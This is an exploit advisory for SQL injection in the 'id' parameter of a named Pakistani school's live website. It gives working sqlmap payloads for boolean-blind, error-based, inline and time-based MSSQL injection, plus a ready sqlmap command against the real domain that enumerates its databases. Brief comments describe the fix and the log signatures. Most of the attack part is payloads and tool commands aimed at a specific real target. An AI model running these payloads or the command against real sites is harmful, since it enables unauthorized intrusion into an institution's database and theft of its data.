# Exploit Title : Nice Education System Peshawar SQL Injection
# Author  : Ahmet Bozkurt
# Date : 23/09/2019
# Vendor Homepage : http://www.niceeducationsystem.edu.pk
# Tested On : Kali Linux
# Category : WebSite
# Exploit Risk : Medium

##############################################################################
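# Exploit
# The "id" GET parameter of index.php reaches the SQL statement unescaped. The payloads that begin with "6)" close a parenthesis, so the value apparently sits in a numeric, parenthesised context where quote escaping alone would not help.
# Fix: bind id as a query parameter and reject any value that is not an integer.
/index.php?id=[SQL Injection]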


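# sqlmap findings for this parameter. In web-server or WAF logs the same requests appear as id values containing CHAR(...)+CHAR(...) concatenations or a multi-way self-join on sysusers.
Parameter: id (GET)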
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6) AND 3391=3391 AND (4096=4096

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: id=6) AND 6970 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6970=6970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))) AND (1245=1245

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6826=6826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=6) OR 4100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2695=2695

# SQLMap

python sqlmap.py -u ""http://www.niceeducationsystem.edu.pk/index.php?id=31" --dbs

##############################################################################

Special Thanks: Jeng4L - imhatimi